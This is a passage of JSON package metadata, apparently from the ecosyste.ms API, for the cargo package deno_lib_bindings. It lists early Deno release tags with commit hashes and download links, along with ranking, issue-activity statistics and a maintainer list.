manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:01:27.332Z","dependent_packages_count":0,"downloads":1941,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":59.928333806831205,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.028408309888841035,"forks_count":0.08705772385289993,"average":24.634879118064646},"purl":"pkg:cargo/deno_lib_bindings","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_lib_bindings","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_lib_bindings","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_lib_bindings/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T13:34:02.013Z","issues_count":6587,"pull_requests_count":9594,"avg_time_to_close_issue":17245043.705291007,"avg_time_to_close_pull_request":1537873.0327909887,"issues_closed_count":3778,"pull_requests_closed_count":7989,"pull_request_authors_count":568,"issue_authors_count":2458,"avg_comments_per_issue":2.5132837407013815,"avg_comments_per_pull_request":0.7158640817177403,"merged_pull_requests_count":6974,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":653,"past_year_pull_requests_count":1185,"past_year_avg_time_to_close_issue":1382328.9581395348,"past_year_avg_time_to_close_pull_request":1329735.605304212,"past_year_issues_closed_count":215,"past_year_pull_requests_closed_count":641,"past_year_pull_request_authors_count":174,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2159264931087288,"past_year_avg_comments_per_pull_request":1.0784810126582278,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":19,"past_year_merged_pull_requests_count":469,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1777,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":672,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":278,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ash